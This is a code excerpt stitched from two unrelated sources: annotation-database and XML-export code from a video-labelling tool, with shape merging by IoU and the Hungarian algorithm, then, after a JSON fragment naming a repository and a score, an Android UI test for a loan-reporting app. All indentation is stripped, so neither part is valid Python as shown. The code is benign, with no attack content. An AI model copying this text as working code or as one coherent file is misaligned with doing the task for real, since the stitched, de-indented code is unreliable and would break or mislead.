for shape in shapes:
db_shape = self._get_shape_class(shape_type)()
db_shape.job = self.db_job
db_shape.label = self.db_labels[shape.label.id]
db_shape.group_id = shape.group_id
db_shape.client_id = shape.client_id
if shape_type == 'boxes':
db_shape.xtl = shape.xtl
db_shape.ytl = shape.ytl
db_shape.xbr = shape.xbr
db_shape.ybr = shape.ybr
else:
db_shape.points = shape.points
db_shape.frame = shape.frame
db_shape.occluded = shape.occluded
db_shape.z_order = shape.z_order
for attr in shape.attributes:
db_attrval = self._get_shape_attr_class(shape_type)()
if shape_type == 'polygons':
db_attrval.polygon_id = len(db_shapes)
elif shape_type == 'polylines':
db_attrval.polyline_id = len(db_shapes)
elif shape_type == 'boxes':
db_attrval.box_id = len(db_shapes)
else:
db_attrval.points_id = len(db_shapes)
db_attrval.spec = self.db_attributes[attr.id]
db_attrval.value = attr.value
db_attrvals.append(db_attrval)
db_shapes.append(db_shape)
db_shapes = bulk_create(self._get_shape_class(shape_type), db_shapes,
{"job_id": self.db_job.id})
for db_attrval in db_attrvals:
if shape_type == 'polygons':
db_attrval.polygon_id = db_shapes[db_attrval.polygon_id].id
elif shape_type == 'polylines':
db_attrval.polyline_id = db_shapes[db_attrval.polyline_id].id
elif shape_type == 'boxes':
db_attrval.box_id = db_shapes[db_attrval.box_id].id
else:
db_attrval.points_id = db_shapes[db_attrval.points_id].id
bulk_create(self._get_shape_attr_class(shape_type), db_attrvals)
def _update_shapes_in_db(self):
client_ids_to_delete = {}
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
client_ids_to_delete[shape_type] = list(shape.client_id for shape in getattr(self, shape_type))
self._delete_shapes_from_db(client_ids_to_delete)
self._save_shapes_to_db()
def _update_paths_in_db(self):
client_ids_to_delete = {}
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
client_ids_to_delete[shape_type] = list(shape.client_id for shape in getattr(self, shape_type))
self._delete_paths_from_db(client_ids_to_delete)
self._save_paths_to_db()
def _delete_shapes_from_db(self, data):
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
client_ids_to_delete = data[shape_type]
deleted = self._get_shape_set(shape_type).filter(client_id__in=client_ids_to_delete).delete()
class_name = 'engine.{}'.format(self._get_shape_class(shape_type).__name__)
if not (deleted[0] == 0 and len(client_ids_to_delete) == 0) and (class_name in deleted[1] and deleted[1][class_name] != len(client_ids_to_delete)):
raise Exception('Number of deleted object doesn\'t match with requested number')
def _delete_paths_from_db(self, data):
client_ids_to_delete = []
for shape_type in ['polygon_paths', 'polyline_paths', 'points_paths', 'box_paths']:
client_ids_to_delete.extend(data[shape_type])
deleted = self.db_job.objectpath_set.filter(client_id__in=client_ids_to_delete).delete()
class_name = 'engine.ObjectPath'
if not (deleted[0] == 0 and len(client_ids_to_delete) == 0) and \
(class_name in deleted[1] and deleted[1][class_name] != len(client_ids_to_delete)):
raise Exception('Number of deleted object doesn\'t match with requested number')
def delete_all_shapes_from_db(self):
for shape_type in ['polygons', 'polylines', 'points', 'boxes']:
self._get_shape_set(shape_type).all().delete()
def delete_all_paths_from_db(self):
self.db_job.objectpath_set.all().delete()
def delete_from_db(self, data):
self._delete_shapes_from_db(data)
self._delete_paths_from_db(data)
def update_in_db(self, data):
if self.init_from_client(data):
self._update_shapes_in_db()
self._update_paths_in_db()
def save_to_db(self, data):
if self.init_from_client(data):
self._save_shapes_to_db()
self._save_paths_to_db()
def to_client(self):
data = {
"boxes": [],
"box_paths": [],
"polygons": [],
"polygon_paths": [],
"polylines": [],
"polyline_paths": [],
"points": [],
"points_paths": [],
}
for box in self.boxes:
data["boxes"].append({
"id": box.client_id,
"label_id": box.label.id,
"group_id": box.group_id,
"xtl": box.xtl,
"ytl": box.ytl,
"xbr": box.xbr,
"ybr": box.ybr,
"occluded": box.occluded,
"z_order": box.z_order,
"frame": box.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box.attributes],
})
for poly_type in ['polygons', 'polylines', 'points']:
for poly in getattr(self, poly_type):
data[poly_type].append({
"id": poly.client_id,
"label_id": poly.label.id,
"group_id": poly.group_id,
"points": poly.points,
"occluded": poly.occluded,
"z_order": poly.z_order,
"frame": poly.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in poly.attributes],
})
for box_path in self.box_paths:
data["box_paths"].append({
"id": box_path.client_id,
"label_id": box_path.label.id,
"group_id": box_path.group_id,
"frame": box_path.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box_path.attributes],
"shapes": [box for box in map(lambda box:
({
"frame": box.frame,
"xtl": box.xtl,
"ytl": box.ytl,
"xbr": box.xbr,
"ybr": box.ybr,
"occluded": box.occluded,
"z_order": box.z_order,
"outside": box.outside,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in box.attributes],
}), box_path.boxes)
],
})
for poly_path_type in ['polygon_paths', 'polyline_paths', 'points_paths']:
for poly_path in getattr(self, poly_path_type):
data[poly_path_type].append({
"id": poly_path.client_id,
"label_id": poly_path.label.id,
"group_id": poly_path.group_id,
"frame": poly_path.frame,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in poly_path.attributes],
"shapes": [shape for shape in map(lambda shape:
({
"frame": shape.frame,
"points": shape.points,
"occluded": shape.occluded,
"z_order": shape.z_order,
"outside": shape.outside,
"attributes": [{'id': attr.id, 'value':attr.value} for attr in shape.attributes],
}), poly_path.shapes)
],
})
return data
def validate_data_from_client(self, data):
client_ids = {
'saved': self._get_client_ids_from_db(),
'create': set(),
'update': set(),
'delete': set(),
}
def extract_clinet_id(shape, action):
if action != 'delete':
if 'id' not in shape:
raise Exception('No id field in received data')
client_id = shape['id']
else:
# client send only shape.id, not shape object
client_id = shape
client_ids[action].add(client_id)
shape_types = ['boxes', 'points', 'polygons', 'polylines', 'box_paths',
'points_paths', 'polygon_paths', 'polyline_paths']
for action in ['create', 'update', 'delete']:
for shape_type in shape_types:
for shape in data[action][shape_type]:
extract_clinet_id(shape, action)
# In case of delete action potentially it is possible to intersect set of IDs
# that should delete and set of IDs that should create(i.e. save uploaded anno).
# There is no need to check that
tmp_res = (client_ids['create'] & client_ids['update']) | (client_ids['update'] & client_ids['delete'])
if tmp_res:
raise Exception('More than one action for shape(s) with id={}'.format(tmp_res))
tmp_res = (client_ids['saved'] - client_ids['delete']) & client_ids['create']
if tmp_res:
raise Exception('Trying to create new shape(s) with existing client id {}'.format(tmp_res))
tmp_res = client_ids['delete'] - client_ids['saved']
if tmp_res:
raise Exception('Trying to delete shape(s) with nonexistent client id {}'.format(tmp_res))
tmp_res = client_ids['update'] - (client_ids['saved'] - client_ids['delete'])
if tmp_res:
raise Exception('Trying to update shape(s) with nonexistent client id {}'.format(tmp_res))
max_id = self.db_job.max_shape_id
if any(new_client_id <= max_id for new_client_id in client_ids['create']):
raise Exception('Trying to create shape(s) with client id {} less than allowed value {}'.format(client_ids['create'], max_id))
return client_ids
def force_set_client_id(self, data):
shape_types = ['boxes', 'points', 'polygons', 'polylines', 'box_paths',
'points_paths', 'polygon_paths', 'polyline_paths']
max_id = self.db_job.max_shape_id
for shape_type in shape_types:
if not data[shape_type]:
continue
for shape in data[shape_type]:
if 'id' in shape:
max_id = max(max_id, shape['id'])
max_id += 1
for shape_type in shape_types:
for shape in data[shape_type]:
if 'id' not in shape or shape['id'] == -1:
shape['id'] = max_id
max_id += 1
class _AnnotationForSegment(_Annotation):
def __init__(self, db_segment):
super().__init__(db_segment.start_frame, db_segment.stop_frame)
self.db_segment = db_segment
def init_from_db(self):
# FIXME: at the moment a segment has only one job always. Thus
# the implementation makes sense. Need to implement a good one
# in the future.
self.reset()
db_job0 = list(self.db_segment.job_set.all())[0]
annotation = _AnnotationForJob(db_job0)
annotation.init_from_db()
self.boxes = annotation.boxes
self.box_paths = annotation.box_paths
self.polygons = annotation.polygons
self.polygon_paths = annotation.polygon_paths
self.polylines = annotation.polylines
self.polyline_paths = annotation.polyline_paths
self.points = annotation.points
self.points_paths = annotation.points_paths
@plugin_decorator
def _dump(tid, data_format, scheme, host, plugin_meta_data):
# For big tasks dump function may run for a long time and
# we dont need to acquire lock after _AnnotationForTask instance
# has been initialized from DB.
# But there is the bug with corrupted dump file in case 2 or more dump request received at the same time.
# https://github.com/opencv/cvat/issues/217
with transaction.atomic():
db_task = models.Task.objects.select_for_update().get(id=tid)
annotation = _AnnotationForTask(db_task)
annotation.init_from_db()
annotation.dump(data_format, scheme, host, plugin_meta_data)
def _calc_box_area(box):
return (box.xbr - box.xtl) * (box.ybr - box.ytl)
def _calc_overlap_box_area(box0, box1):
dx = min(box0.xbr, box1.xbr) - max(box0.xtl, box1.xtl)
dy = min(box0.ybr, box1.ybr) - max(box0.ytl, box1.ytl)
if dx > 0 and dy > 0:
return dx * dy
else:
return 0
def _calc_box_IoU(box0, box1):
overlap_area = _calc_overlap_box_area(box0, box1)
return overlap_area / (_calc_box_area(box0) + _calc_box_area(box1) - overlap_area)
class _AnnotationWriter:
__metaclass__ = ABCMeta
def __init__(self, file, version):
self.version = version
self.file = file
@abstractmethod
def open_root(self):
raise NotImplementedError
@abstractmethod
def add_meta(self, meta):
raise NotImplementedError
@abstractmethod
def open_track(self, track):
raise NotImplementedError
@abstractmethod
def open_image(self, image):
raise NotImplementedError
@abstractmethod
def open_box(self, box):
raise NotImplementedError
@abstractmethod
def open_polygon(self, polygon):
raise NotImplementedError
@abstractmethod
def open_polyline(self, polyline):
raise NotImplementedError
@abstractmethod
def open_points(self, points):
raise NotImplementedError
@abstractmethod
def add_attribute(self, attribute):
raise NotImplementedError
@abstractmethod
def close_box(self):
raise NotImplementedError
@abstractmethod
def close_polygon(self):
raise NotImplementedError
@abstractmethod
def close_polyline(self):
raise NotImplementedError
@abstractmethod
def close_points(self):
raise NotImplementedError
@abstractmethod
def close_image(self):
raise NotImplementedError
@abstractmethod
def close_track(self):
raise NotImplementedError
@abstractmethod
def close_root(self):
raise NotImplementedError
class _XmlAnnotationWriter(_AnnotationWriter):
def __init__(self, file):
super().__init__(file, "1.1")
self.xmlgen = XMLGenerator(self.file, 'utf-8')
self._level = 0
def _indent(self, newline = True):
if newline:
self.xmlgen.ignorableWhitespace("\n")
self.xmlgen.ignorableWhitespace(" " * self._level)
def _add_version(self):
self._indent()
self.xmlgen.startElement("version", {})
self.xmlgen.characters(self.version)
self.xmlgen.endElement("version")
def open_root(self):
self.xmlgen.startDocument()
self.xmlgen.startElement("annotations", {})
self._level += 1
self._add_version()
def _add_meta(self, meta):
self._level += 1
for k, v in meta.items():
if isinstance(v, OrderedDict):
self._indent()
self.xmlgen.startElement(k, {})
self._add_meta(v)
self._indent()
self.xmlgen.endElement(k)
elif type(v) == list:
self._indent()
self.xmlgen.startElement(k, {})
for tup in v:
self._add_meta(OrderedDict([tup]))
self._indent()
self.xmlgen.endElement(k)
else:
self._indent()
self.xmlgen.startElement(k, {})
self.xmlgen.characters(v)
self.xmlgen.endElement(k)
self._level -= 1
def add_meta(self, meta):
self._indent()
self.xmlgen.startElement("meta", {})
self._add_meta(meta)
self._indent()
self.xmlgen.endElement("meta")
def open_track(self, track):
self._indent()
self.xmlgen.startElement("track", track)
self._level += 1
def open_image(self, image):
self._indent()
self.xmlgen.startElement("image", image)
self._level += 1
def open_box(self, box):
self._indent()
self.xmlgen.startElement("box", box)
self._level += 1
def open_polygon(self, polygon):
self._indent()
self.xmlgen.startElement("polygon", polygon)
self._level += 1
def open_polyline(self, polyline):
self._indent()
self.xmlgen.startElement("polyline", polyline)
self._level += 1
def open_points(self, points):
self._indent()
self.xmlgen.startElement("points", points)
self._level += 1
def add_attribute(self, attribute):
self._indent()
self.xmlgen.startElement("attribute", {"name": attribute["name"]})
self.xmlgen.characters(attribute["value"])
self.xmlgen.endElement("attribute")
def close_box(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("box")
def close_polygon(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("polygon")
def close_polyline(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("polyline")
def close_points(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("points")
def close_image(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("image")
def close_track(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("track")
def close_root(self):
self._level -= 1
self._indent()
self.xmlgen.endElement("annotations")
self.xmlgen.endDocument()
class _AnnotationForTask(_Annotation):
def __init__(self, db_task):
super().__init__(0, db_task.size)
self.db_task = db_task
def init_from_db(self):
self.reset()
for db_segment in self.db_task.segment_set.all():
annotation = _AnnotationForSegment(db_segment)
annotation.init_from_db()
self._merge_boxes(annotation.boxes, db_segment.start_frame,
self.db_task.overlap)
self._merge_paths(annotation.box_paths, db_segment.start_frame,
self.db_task.overlap)
self.polygons.extend(annotation.polygons)
self.polylines.extend(annotation.polylines)
self.points.extend(annotation.points)
self.polygon_paths.extend(annotation.polygon_paths)
self.polyline_paths.extend(annotation.polyline_paths)
self.points_paths.extend(annotation.points_paths)
# FIXME PolyShapes merge???
def _merge_paths(self, paths, start_frame, overlap):
# 1. Split paths on two parts: new and which can be intersected
# with existing paths.
new_paths = [path for path in paths
if path.frame >= start_frame + overlap]
int_paths = [path for path in paths
if path.frame < start_frame + overlap]
assert len(new_paths) + len(int_paths) == len(paths)
# 4. Find old paths which are intersected with int_paths
old_paths = []
for path in self.box_paths:
box = path.get_interpolated_boxes()[-1]
if box.frame >= start_frame:
old_paths.append(path)
# 3. Add new paths as is. It should be done only after old_paths
# variable is initialized.
self.box_paths.extend(new_paths)
# Nothing to merge. Just add all int_paths if any.
if not old_paths or not int_paths:
self.box_paths.extend(int_paths)
return
# 4. Build cost matrix for each path and find correspondence using
# Hungarian algorithm.
min_cost_thresh = 0.5
cost_matrix = np.empty(shape=(len(int_paths), len(old_paths)),
dtype=float)
for i, int_path in enumerate(int_paths):
for j, old_path in enumerate(old_paths):
cost_matrix[i][j] = 1
if int_path.label.id == old_path.label.id:
# Here start_frame is the start frame of next segment
# and stop_frame is the stop frame of current segment
stop_frame = start_frame + overlap - 1
int_boxes = int_path.get_interpolated_boxes()
old_boxes = old_path.get_interpolated_boxes()
int_boxes = {box.frame:box for box in int_boxes if box.frame <= stop_frame}
old_boxes = {box.frame:box for box in old_boxes if box.frame >= start_frame}
assert int_boxes and old_boxes
count, error = 0, 0
for frame in range(start_frame, stop_frame + 1):
box0, box1 = int_boxes.get(frame), old_boxes.get(frame)
if box0 and box1:
if box0.outside != box1.outside:
error += 1
else:
error += 1 - _calc_box_IoU(box0, box1)
count += 1
elif box0 or box1:
error += 1
count += 1
cost_matrix[i][j] = error / count
# 6. Find optimal solution using Hungarian algorithm.
row_ind, col_ind = linear_sum_assignment(cost_matrix)
int_paths_indexes = list(range(0, len(int_paths)))
for i, j in zip(row_ind, col_ind):
# Reject the solution if the cost is too high. Remember
# inside int_boxes_indexes boxes which were handled.
if cost_matrix[i][j] <= min_cost_thresh:
old_paths[j].merge(int_paths[i])
int_paths_indexes[i] = -1
# 7. Add all paths which were not processed.
for i in int_paths_indexes:
if i != -1:
self.box_paths.append(int_paths[i])
def _merge_boxes(self, boxes, start_frame, overlap):
# 1. Split boxes on two parts: new and which can be intersected
# with existing boxes.
new_boxes = [box for box in boxes
if box.frame >= start_frame + overlap]
int_boxes = [box for box in boxes
if box.frame < start_frame + overlap]
assert len(new_boxes) + len(int_boxes) == len(boxes)
# 2. Convert to more convenient data structure (boxes by frame)
int_boxes_by_frame = {}
for box in int_boxes:
if box.frame in int_boxes_by_frame:
int_boxes_by_frame[box.frame].append(box)
else:
int_boxes_by_frame[box.frame] = [box]
old_boxes_by_frame = {}
for box in self.boxes:
if box.frame >= start_frame:
if box.frame in old_boxes_by_frame:
old_boxes_by_frame[box.frame].append(box)
else:
old_boxes_by_frame[box.frame] = [box]
# 3. Add new boxes as is. It should be done only after old_boxes_by_frame
# variable is initialized.
self.boxes.extend(new_boxes)
# Nothing to merge here. Just add all int_boxes if any.
if not old_boxes_by_frame or not int_boxes_by_frame:
self.boxes.extend(int_boxes)
return
# 4. Build cost matrix for each frame and find correspondence using
# Hungarian algorithm. In this case min_cost_thresh is stronger
# because we compare only on one frame.
min_cost_thresh = 0.25
for frame in int_boxes_by_frame:
if frame in old_boxes_by_frame:
int_boxes = int_boxes_by_frame[frame]
old_boxes = old_boxes_by_frame[frame]
cost_matrix = np.empty(shape=(len(int_boxes), len(old_boxes)),
dtype=float)
# 5.1 Construct cost matrix for the frame.
for i, box0 in enumerate(int_boxes):
for j, box1 in enumerate(old_boxes):
if box0.label.id == box1.label.id:
cost_matrix[i][j] = 1 - _calc_box_IoU(box0, box1)
else:
cost_matrix[i][j] = 1
# 6. Find optimal solution using Hungarian algorithm.
row_ind, col_ind = linear_sum_assignment(cost_matrix)
int_boxes_indexes = list(range(0, len(int_boxes)))
for i, j in zip(row_ind, col_ind):
# Reject the solution if the cost is too high. Remember
# inside int_boxes_indexes boxes which were handled.
if cost_matrix[i][j] <= min_cost_thresh:
old_boxes[j].merge(int_boxes[i])
int_boxes_indexes[i] = -1
# 7. Add all boxes which were not processed.
for i in int_boxes_indexes:
if i != -1:
self.boxes.append(int_boxes[i])
else:
# We don't have old boxes on the frame. Let's add all new ones.
self.boxes.extend(int_boxes_by_frame[frame])
def dump(self, data_format, scheme, host, plugin_meta_data):
def _flip_box(box, im_w, im_h):
box.xbr, box.xtl = im_w - box.xtl, im_w - box.xbr
box.ybr, box.ytl = im_h - box.ytl, im_h - box.ybr
def _flip_shape(shape, im_w, im_h):
points = []
for p in shape.points.split(' '):
p = p.split(',')
points.append({
'x': p[0],
'y': p[1]
})
for p in points:
p['x'] = im_w - (float(p['x']) + 1)
p['y'] = im_h - (float(p['y']) + 1)
shape.points = ' '.join(['{},{}'.format(point['x'], point['y']) for point in points])
db_task = self.db_task
db_segments = db_task.segment_set.all().prefetch_related('job_set')
db_labels = db_task.label_set.all().prefetch_related('attributespec_set')
im_meta_data = get_image_meta_cache(db_task)
meta = OrderedDict([
("task", OrderedDict([
("id", str(db_task.id)),
("name", db_task.name),
("size", str(db_task.size)),
("mode", db_task.mode),
("overlap", str(db_task.overlap)),
("bugtracker", db_task.bug_tracker),
("flipped", str(db_task.flipped)),
("created", str(timezone.localtime(db_task.created_date))),
("updated", str(timezone.localtime(db_task.updated_date))),
("source", db_task.source),
("labels", [
("label", OrderedDict([
("name", db_label.name),
("attributes", [("attribute", db_attr.text)
for db_attr in db_label.attributespec_set.all()])
])) for db_label in db_labels
]),
("segments", [
("segment", OrderedDict([
("id", str(db_segment.id)),
("start", str(db_segment.start_frame)),
("stop", str(db_segment.stop_frame)),
("url", "{0}://{1}/?id={2}".format(
scheme, host, db_segment.job_set.all()[0].id))
])) for db_segment in db_segments
]),
("owner", OrderedDict([
("username", db_task.owner.username),
("email", db_task.owner.email)
]) if db_task.owner else ""),
])),
("dumped", str(timezone.localtime(timezone.now())))
])
meta.update(plugin_meta_data)
if db_task.mode == "interpolation":
meta["task"]["original_size"] = OrderedDict([
("width", str(im_meta_data["original_size"][0]["width"])),
("height", str(im_meta_data["original_size"][0]["height"]))
])
dump_path = db_task.get_dump_path()
with open(dump_path, "w") as dump_file:
dumper = _XmlAnnotationWriter(dump_file)
dumper.open_root()
dumper.add_meta(meta)
if db_task.mode == "annotation":
shapes = {}
shapes["boxes"] = {}
shapes["polygons"] = {}
shapes["polylines"] = {}
shapes["points"] = {}
boxes = self.to_boxes()
for box in boxes:
if box.frame not in shapes["boxes"]:
shapes["boxes"][box.frame] = []
shapes["boxes"][box.frame].append(box)
polygons = self.to_polygons()
for polygon in polygons:
if polygon.frame not in shapes["polygons"]:
shapes["polygons"][polygon.frame] = []
shapes["polygons"][polygon.frame].append(polygon)
polylines = self.to_polylines()
for polyline in polylines:
if polyline.frame not in shapes["polylines"]:
shapes["polylines"][polyline.frame] = []
shapes["polylines"][polyline.frame].append(polyline)
points = self.to_points()
for points in points:
if points.frame not in shapes["points"]:
shapes["points"][points.frame] = []
shapes["points"][points.frame].append(points)
for frame in sorted(set(list(shapes["boxes"].keys()) +
list(shapes["polygons"].keys()) +
list(shapes["polylines"].keys()) +
list(shapes["points"].keys()))):
link = get_frame_path(db_task.id, frame)
path = os.readlink(link)
rpath = path.split(os.path.sep)
rpath = os.path.sep.join(rpath[rpath.index(".upload")+1:])
im_w = im_meta_data['original_size'][frame]['width']
im_h = im_meta_data['original_size'][frame]['height']
dumper.open_image(OrderedDict([
("id", str(frame)),
("name", rpath),
("width", str(im_meta_data['original_size'][frame]["width"])),
("height", str(im_meta_data['original_size'][frame]["height"]))
]))
for shape_type in ["boxes", "polygons", "polylines", "points"]:
shape_dict = shapes[shape_type]
if frame in shape_dict:
for shape in shape_dict[frame]:
if shape_type == "boxes":
if db_task.flipped:
_flip_box(shape, im_w, im_h)
dump_dict = OrderedDict([
("label", shape.label.name),
("xtl", "{:.2f}".format(shape.xtl)),
("ytl", "{:.2f}".format(shape.ytl)),
("xbr", "{:.2f}".format(shape.xbr)),
("ybr", "{:.2f}".format(shape.ybr)),
("occluded", str(int(shape.occluded))),
])
if db_task.z_order:
dump_dict['z_order'] = str(shape.z_order)
if shape.group_id:
dump_dict['group_id'] = str(shape.group_id)
dumper.open_box(dump_dict)
else:
if db_task.flipped:
_flip_shape(shape, im_w, im_h)
dump_dict = OrderedDict([
("label", shape.label.name),
("points", ';'.join((
','.join((
"{:.2f}".format(float(p.split(',')[0])),
"{:.2f}".format(float(p.split(',')[1]))
)) for p in shape.points.split(' '))
)),
("occluded", str(int(shape.occluded))),
])
if db_task.z_order:
dump_dict['z_order'] = str(shape.z_order)
if shape.group_id:
dump_dict['group_id'] = str(shape.group_id)
if shape_type == "polygons":
dumper.open_polygon(dump_dict)
elif shape_type == "polylines":
dumper.open_polyline(dump_dict)
else:
dumper.open_points(dump_dict)
for attr in shape.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
if shape_type == "boxes":
dumper.close_box()
elif shape_type == "polygons":
dumper.close_polygon()
elif shape_type == "polylines":
dumper.close_polyline()
else:
dumper.close_points()
dumper.close_image()
else:
paths = {}
paths["boxes"] = self.to_box_paths()
paths["polygons"] = self.to_polygon_paths()
paths["polylines"] = self.to_polyline_paths()
paths["points"] = self.to_points_paths()
im_w = im_meta_data['original_size'][0]['width']
im_h = im_meta_data['original_size'][0]['height']
counter = 0
for shape_type in ["boxes", "polygons", "polylines", "points"]:
path_list = paths[shape_type]
for path in path_list:
path_id = path.client_id if path.client_id != -1 else counter
counter += 1
dump_dict = OrderedDict([
("id", str(path_id)),
("label", path.label.name),
])
if path.group_id:
dump_dict['group_id'] = str(path.group_id)
dumper.open_track(dump_dict)
if shape_type == "boxes":
for box in path.get_interpolated_boxes():
if db_task.flipped:
_flip_box(box, im_w, im_h)
dump_dict = OrderedDict([
("frame", str(box.frame)),
("xtl", "{:.2f}".format(box.xtl)),
("ytl", "{:.2f}".format(box.ytl)),
("xbr", "{:.2f}".format(box.xbr)),
("ybr", "{:.2f}".format(box.ybr)),
("outside", str(int(box.outside))),
("occluded", str(int(box.occluded))),
("keyframe", str(int(box.keyframe)))
])
if db_task.z_order:
dump_dict["z_order"] = str(box.z_order)
dumper.open_box(dump_dict)
for attr in path.attributes + box.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
dumper.close_box()
else:
for shape in path.get_interpolated_shapes():
if db_task.flipped:
_flip_shape(shape, im_w, im_h)
dump_dict = OrderedDict([
("frame", str(shape.frame)),
("points", ';'.join((
','.join((
"{:.2f}".format(float(p.split(',')[0])),
"{:.2f}".format(float(p.split(',')[1]))
)) for p in shape.points.split(' '))
)),
("outside", str(int(shape.outside))),
("occluded", str(int(shape.occluded))),
("keyframe", str(int(shape.keyframe)))
])
if db_task.z_order:
dump_dict["z_order"] = str(shape.z_order)
if shape_type == "polygons":
dumper.open_polygon(dump_dict)
elif shape_type == "polylines":
dumper.open_polyline(dump_dict)
else:
dumper.open_points(dump_dict)
for attr in path.attributes + shape.attributes:
dumper.add_attribute(OrderedDict([
("name", attr.name),
("value", attr.value)
]))
if shape_type == "polygons":
dumper.close_polygon()
elif shape_type == "polylines":
dumper.close_polyline()
else:
dumper.close_points()
dumper.close_track()
dumper.close_root()
``` |
{
"source": "100440175/uiautomator2",
"score": 2
} |
#### File: examples/com.xiaoxiao.ludan/test_new_loan.py
```python
from config.random_date import *
import uiautomator2 as u2
import unittest
import time
from utx import *
import uiautomator2.ext.ocr as ocr
class TestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.d = u2.connect()
ocr.API = "http://ocr.open.netease.com/api/ocr"
u2.plugin_register("ocr", ocr.OCR)
cls.d.set_orientation('natural')
cls.d.healthcheck()
cls.d.implicitly_wait(10)
cls.d.app_clear("com.xiaoxiao.ludan")
cls.d.app_stop_all()
cls.NowTime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
cls.test_random = test_random_date()
Case_DIR = os.path.abspath(os.path.dirname(__file__))
cls.loanID_PATH = os.path.join(Case_DIR + "\\config\\loan_info.txt")
def setUp(self):
self.d.set_fastinput_ime(True)
self.sess = self.d.session("com.xiaoxiao.ludan")
self.name = self.test_random.get_name()
self.phone = self.test_random.createPhone()
self.idcard = self.test_random.idcard_generator()
def tearDown(self):
self.d.app_stop_all()
self.d.set_fastinput_ime(False)
def login(self,username,password):
d = self.sess
d.watchers.remove()
d.watchers.watched = False
log.info('开始登录>>>>>>>>>>')
d.watcher("获取app权限").when(resourceId="android:id/button1").when(text="允许").click(text="允许")
d.watchers.run()
d(resourceId="com.xiaoxiao.ludan:id/et_account").set_text(username,timeout=10)
d(resourceId="com.xiaoxiao.ludan:id/et_password").set_text(password,timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/bt_login").click_exists(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title").exists(timeout=2) == True:
d(resourceId="com.xiaoxiao.ludan:id/ed_vc").set_text('8888',timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_sign").click(timeout=5)
else:
pass
self.assertTrue(d(text=u"首页").exists(timeout=3),msg=d.toast.get_message(10, 5))
log.info('服务器返回:%s' % d.toast.get_message(10, 10))
print('服务器返回:%s' % d.toast.get_message(10, 10))
@tag(Tag.FULL)
def test_new_loan(self):
""" 业务员新建报单
:return:
"""
d = self.sess
self.login(81,12345678)
log.info('开始新建报单>>>>>>>>>>')
d(resourceId="com.xiaoxiao.ludan:id/tv_menu", text=u"快速报单").click(timeout=10)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").exists(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"合同费用").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d(scrollable=True).scroll.to(text="新增客户")
d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text="合同项目").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_edit_title",text="合同项目").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(u"测试数据 - %s" % self.NowTime,timeout=2)
d.swipe(0.1, 0.9, 0.9, 0.1,duration=0.5)
d(resourceId="com.xiaoxiao.ludan:id/tv_right").click_exists(timeout=5)
log.info('本次随机生成的客户名称为:%s' % self.name)
print('本次随机生成的客户名称为:%s' % self.name)
log.info('本次随机生成的手机号码为:%s' % self.phone)
print('本次随机生成的手机号码为:%s' % self.phone)
log.info('本次随机生成的证件号码为:%s' % self.idcard)
print('本次随机生成的证件号码为:%s' % self.idcard)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").exists(timeout=5)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").clear_text()
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"姓名").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.name)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"手机号").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.phone)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"证件类型").sibling(resourceId="com.xiaoxiao.ludan:id/tv_content").click()
if d(resourceId="com.xiaoxiao.ludan:id/tv_type", text=u"香港身份证").exists(timeout=3) == True:
d(resourceId="com.xiaoxiao.ludan:id/tv_type", text=u"香港身份证").click(timeout=5)
else:
self.d.ext_ocr.all()
self.d.ext_ocr("香港身份证").click(timeout=3)
d(resourceId="com.xiaoxiao.ludan:id/tv_content_name", text=u"证件号码").sibling(resourceId="com.xiaoxiao.ludan:id/et_content").set_text(self.idcard)
d(resourceId="com.xiaoxiao.ludan:id/right").click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title",text='快速报单').exists(timeout=3) == True:
d(resourceId="com.xiaoxiao.ludan:id/right").click_exists(timeout=5)
self.assertTrue(d(resourceId="com.xiaoxiao.ludan:id/title", text='报单详情').exists(timeout=3),msg=d.toast.get_message(10, 5))
d(resourceId="com.xiaoxiao.ludan:id/iv_right").click_exists(timeout=10)
d(text='新增贷款').click(timeout=5)
if d(resourceId="com.xiaoxiao.ludan:id/title", text=u'贷款信息').exists(timeout=5) == True:
log.info(d.toast.get_message(10, 5))
print(d.toast.get_message(10, 5))
